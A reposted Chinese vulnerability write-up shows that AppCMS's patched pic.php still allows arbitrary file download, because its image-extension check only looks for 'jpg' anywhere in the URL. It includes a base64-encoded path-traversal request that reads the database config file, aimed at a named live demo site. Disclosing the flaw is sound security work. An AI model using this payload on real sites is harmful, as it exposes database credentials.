未加星标

appcms最新补丁处理不当仍然任意文件下载

字体大小 | |
[web安全 所属分类 web安全 | 发布者 店小二04 | 时间 20131127 | 作者 lxj616 ] 0人收藏点击收藏
虽然 appcms 对之前的第一次任意文件下载 进行了修补,但是修补方式不当,导致仍然能够任意文件下载(官方演示站再次验证)

经补丁后的文件pic.php如下(注释为本人做的说明)


<php
if(isset($_GET['url']) && trim($_GET['url']) != '' && isset($_GET['type'])) {
$img_url = base64_decode($_GET['url']);
$_GET['url']=strtolower($img_url); //解码后相当于没有编码
$_GET['type']=strtolower($_GET['type']);
$arr_a=array('jpg','jpeg','png','gif'); //扩展名白名单
$down=0; //down=1时标记审计策略通过
foreach($arr_a as $b){ //循环审计
if(strstr($_GET['url'],$b)){ //如果url里包含白名单jpg字符串即为审核通过,问题就出在这里,url里只要出现jpg就可以,那么xxx/xxx.jpg是合法的,但是呢,假定xxxjpg/../xxx.php会通过判定!$down=1;
}
}
if($_GET['type']=='php') $down=0; //完全没有用处,不是根据type判定的
if($down==1){
$shffix = trim($_GET['type']); //下面没有任何限制了,直接文件读取了
header("Content-Type: image/{$shffix}");
readfile($img_url);
}else{
die('image type forbidden');
}
} else {
die('image not find!');
}
?>

结合以上分析,构造一下即可任意文件下载

/pic.php?url=MWpwZy8uLi9jb3JlL2NvbmZpZy5jb25uLnBocA==&type=jpg

注:示例的base64为: 1jpg/../core/config.conn.php

证明:

1.先证明官方演示站点已经打过补丁,即不存在之前的老漏洞

appcms最新补丁处理不当仍然任意文件下载

2.证明本次漏洞的存在

http://www.kele8.cn/pic.php?url=MWpwZy8uLi9jb3JlL2NvbmZpZy5jb25uLnBocA==&type=jpg


appcms最新补丁处理不当仍然任意文件下载
appcms最新补丁处理不当仍然任意文件下载

修复方案:

严格过滤url中不能有特殊字符

本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师

代码区博客精选文章
分页:12
转载请注明
本文标题:appcms最新补丁处理不当仍然任意文件下载
本站链接:https://www.codesec.net/view/967.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | web安全 | 评论(0) | 阅读(26)